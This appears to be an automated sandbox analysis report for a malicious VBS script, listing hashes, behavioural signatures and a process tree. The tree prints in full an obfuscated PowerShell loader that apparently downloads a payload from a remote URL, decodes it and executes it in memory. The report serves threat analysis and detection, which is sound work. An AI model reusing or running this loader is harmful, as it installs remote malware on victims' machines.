Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
12/06/2024, 01:42
Static task
static1
Behavioral task
behavioral1
Sample
89b3a98019be90bfb177697d4626af656d33a05300caba99bf92595a87e57d70.vbs
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
89b3a98019be90bfb177697d4626af656d33a05300caba99bf92595a87e57d70.vbs
Resource
win10v2004-20240508-en
General
-
Target
89b3a98019be90bfb177697d4626af656d33a05300caba99bf92595a87e57d70.vbs
-
Size
104KB
-
MD5
089b7a8a18feaba64300e3d318b63788
-
SHA1
9cc4e108aea660fe7de58047ef64ee6eaef327db
-
SHA256
89b3a98019be90bfb177697d4626af656d33a05300caba99bf92595a87e57d70
-
SHA512
5ae0068900f49088802dd8ccea6b59cb64410d57e52803d76a41943ec5949b9b5ff5d7aa6c97e926d799251d90e985f9957dca06911fc466d337c49c7aed4917
-
SSDEEP
3072:RRPdTrsfoqVUCmJkd9y5TX3eRIYceoLcqnVvApOdQLqaR:RRwoM1A4w5TneRIYlMcqVvmOiqo
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1176 powershell.exe 1176 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1176 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4588 wrote to memory of 1176 4588 WScript.exe 86 PID 4588 wrote to memory of 1176 4588 WScript.exe 86 PID 1176 wrote to memory of 1368 1176 powershell.exe 88 PID 1176 wrote to memory of 1368 1176 powershell.exe 88
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\89b3a98019be90bfb177697d4626af656d33a05300caba99bf92595a87e57d70.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Cryptology = 1;Function Privatkapitalistiske($hygienization){$Succesfuldest=$hygienization.Length-$Cryptology;$Tangentially='Substring';For( $Sardinens=5;$Sardinens -lt $Succesfuldest;$Sardinens+=6){$Ermanno+=$hygienization.$Tangentially.Invoke( $Sardinens, $Cryptology);}$Ermanno;}function Frenulum($Imagery){ .($Artighed) ($Imagery);}$Hakki=Privatkapitalistiske 'EyestM MontoBereszUvedeiGultol.eenelpho sa Acan/ O,er5Cy,th.Anteg0P.ros Cakil( LinaW.eairiEng,nnReposd oggioLu efwUnrecsSearc SufflNSlgenTNonbu Depar1Brnd.0hoved.Talle0Maean; ,oer RenlyWAw rdianvennTanke6 phi4 Phen;Bru.m BastxNykla6Udpan4 Mil,;fedtm Conscr,narcv Dame:Resto1 Dis,2 B la1 Cyk..Simpl0Reci.)Rubic GallaGSplene Subtc resskFlygtoSwoop/ Livr2Bulld0Su.ca1intra0Skraa0 Biox1Pse,d0Dechi1Afide G.nnFSmer i ChefrMethoeHndelfGldssoearw.xGuaka/ Para1Unsto2Paran1W,vie.Laugh0Hu.il ';$Lyspaavirkningerne=Privatkapitalistiske 'BeskdUDewansHydroeBr.vbrDen t-Mat,eALngdegE.istePatibnBog.kteutha ';$Udstrmningens=Privatkapitalistiske 'blrehhOceantCollutLavtrp,tavnsTrimt:Elekt/Sibyl/ R,ivcKultudBrikkn Over.Di yadTazeti AliqsKri lc gyptoEncaprAfsavdnos.raInhomp g.stpRemin.MistncCr,ekoJentrmSkral/P abua onegtBedemtvap,ra U pocMontjhHeel,mS.enkeStedfnMrkvrtKrep.s Va d/Vo.do1Mouth2Gimpo4La.or9Dr,ll4Gigan9Velko3Mulat5Bombe2Frdig2Yenit9Akant0Twifo2Shaki6Pensi8 Pali3Bugtn6,orsr9Swart2Pamp./A.gla1Kommu2Omfav4Entop9.rmer5Karim5Spe.i1 Over3Latte4udjvn7 ,our4 Traa2 Sp e2Mo,oe8Cry t5Premi9Bi,fl2Unexp6Conso5 Frs./Pa.siS Epink Hissa Molars gskpOceansHumpek NervyO iditElefatUn hieLangsrModvisun,ur.ToparcTreb.sCathov Arch?SkandePhalaxMisgr=I.tro6 Alts6S idt6Saldo7 Gillb Oddf6Rilese venh0Gues.& platise,tesMolyb= Trus6Cigar6Sphyg6Han,l6Blueb6Afske5Syste6fetis0Chron& RverhSmokimFod i=UnimpeAtmo,d Diso9Kar ocSvin 4Indla1 morm6 Plime R,baa Opst1Absor7 Alas4Pitto5Mesop2K noneS.avneEl,te6EnatibDriftaPonde6U,derb agni7Uti,s9Inser1 U,te8F.rstcCons.d Tvan8 SvinaBerri1PrimsdT,eah3Uncho0ExpirdMaale7Belys6G roncSkotjd.uiog2Pycnod Totic aduk8Overf0MicrofGradu5takle5Extra9Spind7B scadHackm2 kapifSladecReprsd,amlsaKogef0Temat9Gauts2 Ther2th,rd5Matem9Knig.5 cons8Ob,as6navig0.nnym& Torp ';$Hovedleverandrers=Privatkapitalistiske 'Geoph>Forfr ';$Artighed=Privatkapitalistiske ' WieliBegraeAppelxMisco ';$Topteksters='Elly';$Allons = Privatkapitalistiske 'Shovee,ejeccReconhTipl,oBr,df Ex,ra%Appula,ordmpVaabepPutoudstr,baPassat TeknaSk ni%Argue\A.tiaPAplusrTrainoAfmrkp Moriy dspylHypocaOuts.lHipp.kBevisosuc ehbadm o Ba ol Subc.Re,isBBonceuSuperz pigr For l& Ura.& ca.a TarmkeMatadc AnathKontooShrug K,rdtatmos ';Frenulum (Privatkapitalistiske ' Bear$FdmungR.lgglKeloioDumfobSemicaSchlelSlett:SlippBPhyseuTradibSofapbOffeniPreppeSamlesClari=Ameri( awakcBraddm Marod Warw Hydr/ ,ktacEn er Begy$OutspARevivlPa,lalMa,kioRen.rnStorms.eucr)Rrl,n ');Frenulum (Privatkapitalistiske 'Cort,$EkstrgCe.trlStrejo estubFaneraSte.ml Depi: Sk bA StamnGentltAfmatiNickerDefeai.pelucDip oiEl,hin bund=.achi$ Br.gUKl.sedFircisK.ltutJett.r,fordmfine nEjegoihjemmnBkkengUngare Repen UdlbsBnnes.,verfs Dupsp PortlSnudeiOverpt Armb(Retro$SnowhHD.tesoMormyv angie OzondImma,l .arleProclv almie.artorProviaPropenMilred Co,lr ,nsaeHyperrD.fens ymal).orfi ');$Udstrmningens=$Antiricin[0];$Subhumanly= (Privatkapitalistiske 'Entam$ He.egdelaglMark,odatatbPerioaLynt l Infl:M.tatACapr,r Fo sb AldaeRo,stjHoveddArbejs ChrohClerey .uggp Pib o ske.tIrregeFalk,sTrdniefj rnr Rin nBal aeOvercs Br n=F nanNDiadeeMed.cw ngen-.ampuOE.patbGenerjU komeIntercEfsdetUngru paleSNossey MeddsClot,tMakuleUnchamV drr.FjernNInfi,eUngent Akti.SnirkW Hi heAni.obInd eCSadellForegiSovjeeOvervnBlodut');$Subhumanly+=$Bubbies[1];Frenulum ($Subhumanly);Frenulum (Privatkapitalistiske ' Over$wokkaABldnirF.rsmbAft,geTingsjElomodHeksasW,isthAnkhfy Wa,lp Su,roFu,gyt S rve.ejnfsSam,eeS,ciarRedivnopaloeSjaggsBench.Fo.prHKf,ere TakoaP lygdFyldseWhipcr PolysTr.ch[Po tv$ Kof,Lbekjeymargis Diurp S.mmaFaldsa .altvTred,i egior Unplk ,armnAgentiEk pln ,livgTegneeFilm.rExtenn GlaseAnstu]Frygt= inne$FlossHFlehoaSubcuk DalbkPoch iTekno ');$Meteoroscope=Privatkapitalistiske 'P.rad$ BeluARr trrFloejbU.ugueFe,ntj icked,eaccsPumelh illeyAmph.pIntraoOp tetHvdede Ov.rsLoiteeUndisr c.dinfuraneGuny.sN,cro.C.lamD AlimoStaliwPetrenCurrylSteelo B staPadledShellFvolumiSignalTempee Ejen(Mas e$ D,flUPhospdInscisNesset CucurCiv lmU.acrnNon,eigrundnUndepgSuppreCentrnIns,rsCeram,Ar ej$ zariABiomsa UdhanMisardOpmuneForma)Visce ';$Aande=$Bubbies[0];Frenulum (Privatkapitalistiske 'Poeti$Urolig leemlIchthoBarn.bForbya Sterl nfig:O erfSselskt fugluCocktm PenefKa,apiCapetlCognamTipsmsarch.kStrafl PlanaKursls Oph sKataliDesqukSh reegri trBl.kbeFros,sHaand= olut(rdninTRev seU.sovs SupetExpan-tilskPOss,oaAandet,vineh floe Tils.$ eknoACl,riaRet.rnSyn.edSilkee egoi) K al ');while (!$Stumfilmsklassikeres) {Frenulum (Privatkapitalistiske 'Storm$BohemgCrzetlArmbroNulsrbBes raGenerlSquam: Sv bM Un,laR,dder,iffeaatt.as EgencGru,daTra,s=Hjrej$OverctsenonrDybvauL neneMaste ') ;Frenulum $Meteoroscope;Frenulum (Privatkapitalistiske 'Res,iSSkjortRegioaDriftr .ajet V lg-S.eglSShowil PhaneHorstePara.pObers Lejli4Opspi ');Frenulum (Privatkapitalistiske 'D pon$ MispgUndrilvaldhoFordobPattuaRacebl Tine:Rund,SS.oletSkrntu Studm B.enfAnskui CentlB efrm Jus s BekrkSter.l kla.aPostasLatins FjeriChes,kKompleS ortr useneO.iersoppu.=A,aph( DicyTCroppeFagkos Fla.tKnsro-SubdePManila.iddhtBarnehelekt Skyg.$TrabeAbo,kra hephnEvig.dRecone scil) Favi ') ;Frenulum (Privatkapitalistiske 'Al er$ El,cgInditl moseoanticb,enytaPeep.lTankb:PromaRLeadeoDyreab,arveuBydels.utchtRemixeKiosksKoral=Lak,i$ Spo gBe.dsl Neoio ygerbLleuta hypolEvoc.: Di,tM OveriVersalHeterj,upffbGroggeOutdrsG wkekFeltiyEl tetS spet Genge,pmunl Kosts,laise ConjsaeneuhKladde.lealnMi ros ShunyLsefenUd,ov+Me ar+Warm.%Julol$TriumAUvsennR sikt oculiAffinrRegioi Skric .nswiKlatsn Dagc.ulovmcSad.loEkshiuThermn Facetumuli ') ;$Udstrmningens=$Antiricin[$Robustes];}$Defaitistens=300914;$Muslimmer=28838;Frenulum (Privatkapitalistiske 'P,ura$KneppgKommalTran,o nconbTroc aWokowl Anom:SiddeP rune Pl ur.ilhai.olurp,ondeadataspTitaliHo.helRegnilSnakeaVegaerretiryVarme Hyste= Dege CarnGCostae li,ltFldeb-PanmiC.irkeoAgen nTel,mtUn,rieHemignStabetD,but Stoer$D sylA ticyaDemonnbeskfdelflaeFrihj ');Frenulum (Privatkapitalistiske 'S.ran$FolkbgDesorlDef,boC splbKo,reaNeddyl Ford: In hMUnc iaFlaber,kaankmemorfFlageoSimserInsinsscologQuadreSubcyt la d Trig=Polye Depra[FuldeS Krafyjackos BibltAl,ere hu,emSpind. HillCFor,eo Le cnJonnivPersoe FingrHe.olt a,te] News:Skold:AssecFPseudr AminoForsimkarakBQua,aaDksvisBilleeBruis6Overh4L,dssS TristSluffr ,orti ,oprnComplgkatag( Brge$Ko,liPUnedieNonsur con i.ulogpTedioa S.yppKaleniArbe.l ChamlSu,fraIn errSkl eyOverl)versi ');Frenulum (Privatkapitalistiske '.ilde$ DefogOp,adlWarreoraacrbSemifa Be,llIde,l:Forn.BprodsaTitridSorineBetndbCharauforlakGodtrs Slb.e NoggrKrypts Dila Tudet=Obser Bere[K metSSkraay PhaesReesttHe mieDebilmKonce.HilsaTKirtle eropxFluoat Prop.Sk.leEVandrnKlirrcDio,eoGa,ncdTeo.ii BevinFasefg Bela] Scre:Oneir:SejtrAVelseSP.agrCSub.tISour IBevog.AigueGLor.ne GenntNsketSS.ulttLagerrTrefliPersonHippogFjern(Hjert$MedicMSe.vea Bahur S,edk TuttfB skeo versr,tilbsHjni gUnd,reBifalt Enco)Binno ');Frenulum (Privatkapitalistiske 'Disid$MalicgFrisrlOversoVitelb RippaCo.ntlPal.e:AfskrSSenareAppanl SecrvCommoh BereeBladsn UnintIntroe JernrBj rseVareb=Pop.l$samfuBProviaEllendStnfeeI.terb unsouOmendkFors.sUds oeFangerMaplesServa.M.lers.orhauClassbK.nsusUdbret AerorSubscilaborn,letogboo.t(Mi,us$UlykkD FreeeSky,dfSpasmaUnr,eiEucl,tKbmn,iSp,risSkaktt SekteImpennTempus.ngan, Sk.w$Su,nuM onfuPre,csResoll.uthaiSamk mUlselm MispeDiallrBonit)Per.e ');Frenulum $Selvhentere;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Propylalkohol.Buz && echo t"3⤵PID:1368
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82